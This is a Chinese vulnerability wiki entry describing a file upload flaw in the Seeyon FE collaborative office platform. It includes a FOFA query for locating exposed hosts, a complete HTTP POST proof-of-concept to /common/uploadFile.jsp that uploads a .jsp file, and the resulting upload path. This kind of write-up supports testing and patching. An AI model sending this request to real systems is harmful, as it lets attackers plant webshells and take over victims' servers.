fofamini-wiki

登录白背景

源码

致远互联FE协作办公平台uploadFile存在文件上传漏洞

一、漏洞简介

北京致远互联软件股份有限公司致远互联-FE协作办公平台存在文件上传漏洞。

二、影响版本

致远互联-FE协作办公平台

三、资产测绘

fofaapp="致远互联-FE"
特征

四、漏洞复现

POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=23061845090001.jpg&title1=%C9%CF%B4%AB%CE%C4%BC%FE&title2=%D1%A1%D4%F1%CE%C4%BC%FE&allowsize=null&extName=.jsp HTTP/1.1
Host: 
Content-Length: 207
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylBU670lIdrGgVSWG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=64E63D22BDCC849C4050E5713F838F2B
Connection: close

------WebKitFormBoundarylBU670lIdrGgVSWG
Content-Disposition: form-data; name="accessory"; filename="svg.jsp"
Content-Type: application/octet-stream

test1
------WebKitFormBoundarylBU670lIdrGgVSWG--

上传文件位置

/images/upload/24032036590001.jsp

seeyonfe-uploadfile-upload.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/kxutssodovg33gno

# 致远互联FE协作办公平台uploadFile存在文件上传漏洞

# 一、漏洞简介
北京致远互联软件股份有限公司致远互联-FE协作办公平台存在文件上传漏洞。

# 二、影响版本
+ 致远互联-FE协作办公平台

# 三、资产测绘
+ fofa`app="致远互联-FE"`
+ 特征

![1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a.png](./img/w8t0OMAHjGqbL7eC/1698659959745-2fa812d0-dff6-4e46-9a5a-d5060f83756a-839104.png)

# 四、漏洞复现
```plain
POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=23061845090001.jpg&title1=%C9%CF%B4%AB%CE%C4%BC%FE&title2=%D1%A1%D4%F1%CE%C4%BC%FE&allowsize=null&extName=.jsp HTTP/1.1
Host: 
Content-Length: 207
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarylBU670lIdrGgVSWG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=64E63D22BDCC849C4050E5713F838F2B
Connection: close

------WebKitFormBoundarylBU670lIdrGgVSWG
Content-Disposition: form-data; name="accessory"; filename="svg.jsp"
Content-Type: application/octet-stream

test1
------WebKitFormBoundarylBU670lIdrGgVSWG--
```

![1710910824608-7f14844d-1a1c-411b-ae0e-6f30e6572664.png](./img/w8t0OMAHjGqbL7eC/1710910824608-7f14844d-1a1c-411b-ae0e-6f30e6572664-221328.png)

上传文件位置

```plain
/images/upload/24032036590001.jsp
```

![1710910851071-196f0e71-d399-4e4f-8b26-b50a3309868b.png](./img/w8t0OMAHjGqbL7eC/1710910851071-196f0e71-d399-4e4f-8b26-b50a3309868b-652399.png)

[seeyonfe-uploadfile-upload.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/29512878/1730787586597-fdadd752-ac5a-416f-a673-d7b17f2fa4dd.yaml)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/kxutssodovg33gno>